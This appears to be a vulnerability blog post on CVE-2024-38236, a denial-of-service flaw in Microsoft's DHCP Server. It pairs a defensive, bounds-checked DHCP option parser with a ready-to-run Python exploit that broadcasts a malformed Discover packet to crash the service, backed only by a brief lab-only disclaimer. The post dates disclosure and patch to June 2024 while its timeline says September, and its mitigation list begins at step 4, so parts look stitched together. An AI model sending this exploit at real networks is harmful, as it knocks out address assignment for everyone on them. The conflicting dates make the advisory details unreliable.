In June 2024, Microsoft disclosed CVE-2024-38236, a vulnerability affecting its widely used DHCP (Dynamic Host Configuration Protocol) Server. This bug enables attackers to remotely crash the DHCP service, resulting in network outages for any infrastructure that relies on DHCP for automatic IP assignment. In this post, we’ll break down what CVE-2024-38236 is, show a reproducible proof-of-concept (PoC), discuss mitigations, and direct you to the official patches and advisories.
What is CVE-2024-38236?
The vulnerability stems from improper handling of crafted requests in Microsoft’s DHCP Server service. By sending a specially crafted DHCP packet, an attacker on the local network can cause the DHCP Server to enter a denial-of-service (DoS) state, taking it offline until it is manually restarted. While it does not allow direct code execution or privilege escalation, the attack can cause serious interruption for any environment relying on DHCP (for example, offices, schools, or even ISPs).
Exploit Details & How It Works
This vulnerability relies on malformed options within DHCP packets. When the Microsoft DHCP Server tries to process the incoming packet, it encounters an unhandled condition (such as an invalid length or an option outside expected bounds), which crashes the service process.
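The defensive counterpart to that failure mode is a DHCP option parser that checks every length byte against the bytes actually left in the packet before touching them. The following is an added example written for this post, not code from Microsoft or from the original article: a bounds-checked options parser plus a small classifier that a server, an IDS rule author, or a packet-capture triage script could use to flag a Discover whose message-type option claims more bytes than the packet holds. The packets it runs on are constructed inline for illustration (the client MAC and transaction ID are sample values), not captures of real traffic.

```python
# Added example (not from the original post): a bounds-checked DHCP option
# parser of the kind a server or a monitoring sensor needs so that an option
# whose length field exceeds the remaining buffer is rejected instead of being
# read past the end of the packet. Sample packets below are constructed here.
import struct

DHCP_MAGIC_COOKIE = b'\x63\x82\x53\x63'
BOOTP_FIXED_LEN = 236            # fixed BOOTP header before the options field
OPT_PAD, OPT_END = 0, 255
OPT_MESSAGE_TYPE = 53


class MalformedDHCP(ValueError):
    """Raised for any option that does not fit inside the packet."""


def parse_dhcp_options(packet: bytes) -> dict:
    """Return {option_code: value_bytes}, validating every length field.

    Each length byte is checked against the bytes actually remaining, so a
    claimed length of 255 in a packet that holds fewer bytes raises instead of
    slicing past the end (Python would silently truncate the slice; a C parser
    would read out of bounds).
    """
    if len(packet) < BOOTP_FIXED_LEN + len(DHCP_MAGIC_COOKIE):
        raise MalformedDHCP("packet shorter than BOOTP header + magic cookie")
    cookie = packet[BOOTP_FIXED_LEN:BOOTP_FIXED_LEN + 4]
    if cookie != DHCP_MAGIC_COOKIE:
        raise MalformedDHCP("missing DHCP magic cookie")

    options = {}
    pos = BOOTP_FIXED_LEN + 4
    while pos < len(packet):
        code = packet[pos]
        pos += 1
        if code == OPT_PAD:          # single-byte pad, no length field
            continue
        if code == OPT_END:          # single-byte terminator
            return options
        if pos >= len(packet):
            raise MalformedDHCP(f"option {code} has no length byte")
        length = packet[pos]
        pos += 1
        if pos + length > len(packet):
            raise MalformedDHCP(
                f"option {code} claims {length} bytes but only "
                f"{len(packet) - pos} remain")
        options[code] = packet[pos:pos + length]
        pos += length
    raise MalformedDHCP("options field not terminated by End option (255)")


def build_bootp_header(xid: int = 0x3903f326) -> bytes:
    """Minimal BOOTREQUEST header (236 bytes) with a constructed client MAC."""
    mac = bytes.fromhex('000c294f8e35')  # constructed sample address
    return (struct.pack('!BBBBIHH', 1, 1, 6, 0, xid, 0, 0x8000)  # op..flags
            + b'\x00' * 16                 # ciaddr, yiaddr, siaddr, giaddr
            + mac + b'\x00' * 10           # chaddr (16 bytes)
            + b'\x00' * 192)               # sname (64) + file (128)


def classify(packet: bytes) -> str:
    """Verdict a sensor could log: 'ok' or 'malformed: <reason>'."""
    try:
        opts = parse_dhcp_options(packet)
    except MalformedDHCP as exc:
        return f"malformed: {exc}"
    if OPT_MESSAGE_TYPE not in opts or len(opts[OPT_MESSAGE_TYPE]) != 1:
        return "malformed: message type option missing or wrong size"
    return "ok"


# Constructed sample packets: a well-formed Discover, and one whose option 53
# claims 255 bytes while only 2 bytes follow the length field.
GOOD_DISCOVER = (build_bootp_header() + DHCP_MAGIC_COOKIE
                 + bytes([OPT_MESSAGE_TYPE, 1, 1])   # DHCPDISCOVER
                 + bytes([OPT_END]))
BAD_LENGTH = (build_bootp_header() + DHCP_MAGIC_COOKIE
              + bytes([OPT_MESSAGE_TYPE, 255, 1])
              + bytes([OPT_END]))

if __name__ == '__main__':
    for name, pkt in (('good', GOOD_DISCOVER), ('bad-length', BAD_LENGTH)):
        print(f"{name}: {classify(pkt)}")
```

The important check is the single comparison `pos + length > len(packet)` before the slice: it is the bound the post describes the vulnerable service as lacking, and it is cheap enough to apply to every option on every packet.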
Example Traffic
An offending DHCP packet might abuse the length field or option values to trigger the flaw. For this example, let’s focus on a DHCP Discover packet with invalid options:
# dhcp_dos_exploit.py
import socket


def build_dhcp_discover():
    # Ethernet frame and basic setup omitted for brevity
    dhcp_discover = b''
    dhcp_discover += b'\x01'                  # Message type: Boot request (1)
    dhcp_discover += b'\x01'                  # Hardware type: Ethernet
    dhcp_discover += b'\x06'                  # Hardware address length: 6
    dhcp_discover += b'\x00'                  # Hops: 0
    dhcp_discover += b'\x39\x03\xf3\x26'      # Transaction ID
    dhcp_discover += b'\x00\x00'              # Seconds elapsed: 0
    dhcp_discover += b'\x80\x00'              # Bootp flags: 0x8000 (Broadcast)
    dhcp_discover += b'\x00' * 4              # Client IP address: 0.0.0.0
    dhcp_discover += b'\x00' * 4              # Your (client) IP address: 0.0.0.0
    dhcp_discover += b'\x00' * 4              # Next server IP address: 0.0.0.0
    dhcp_discover += b'\x00' * 4              # Relay agent IP address: 0.0.0.0
    dhcp_discover += b'\x00\x0c\x29\x4f\x8e\x35'  # Client MAC address (\x0c: two hex digits are required)
    dhcp_discover += b'\x00' * 10             # Padding for MAC (chaddr is 16 bytes)
    dhcp_discover += b'\x00' * 192            # BOOTP legacy padding (sname 64 + file 128)
    dhcp_discover += b'\x63\x82\x53\x63'      # DHCP magic cookie
    # Here is the malformed option (option 53, with illegal length)
    dhcp_discover += b'\x35'                  # DHCP Message Type
    dhcp_discover += b'\xff'                  # Length field set way too high (255)
    dhcp_discover += b'\x01' * 255            # Exaggerated values just to crash the parser
    # End option
    dhcp_discover += b'\xff'
    return dhcp_discover


def send_dhcp():
    # Sending raw UDP packet
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.sendto(build_dhcp_discover(), ('255.255.255.255', 67))
    print("Malformed DHCP Discover sent!")


if __name__ == '__main__':
    send_dhcp()
⚠️ For educational testing in isolated labs only. Never attack a production system or network you don’t own.
- Microsoft’s official patch (June 2024 Patch Tuesday)
- Advisory: CVE-2024-38236 | DHCP Server Service Denial of Service Vulnerability
- Security Update: Download Updates via Windows Update or your preferred management system
4. If You Can’t Patch
- As a temporary step, restrict DHCP traffic (port 67/UDP) at the router to only required devices.
References and Further Reading
- Microsoft Security Update Guide – CVE-2024-38236
- ISC DHCP RFC – General info on DHCP protocol
- Wireshark DHCP Analysis – Learn to analyze DHCP traffic
Final Thoughts
DHCP is the backbone of most networks, silently ensuring devices get IPs every day. Flaws like CVE-2024-38236 remind us of the importance of defense-in-depth: don’t expose essential services outside their trusted enclave, and keep up with patches. If you run Microsoft DHCP servers, this is a must-fix vulnerability.
Timeline
Published on: 09/10/2024 17:15:27 UTC
Last modified on: 10/09/2024 01:26:09 UTC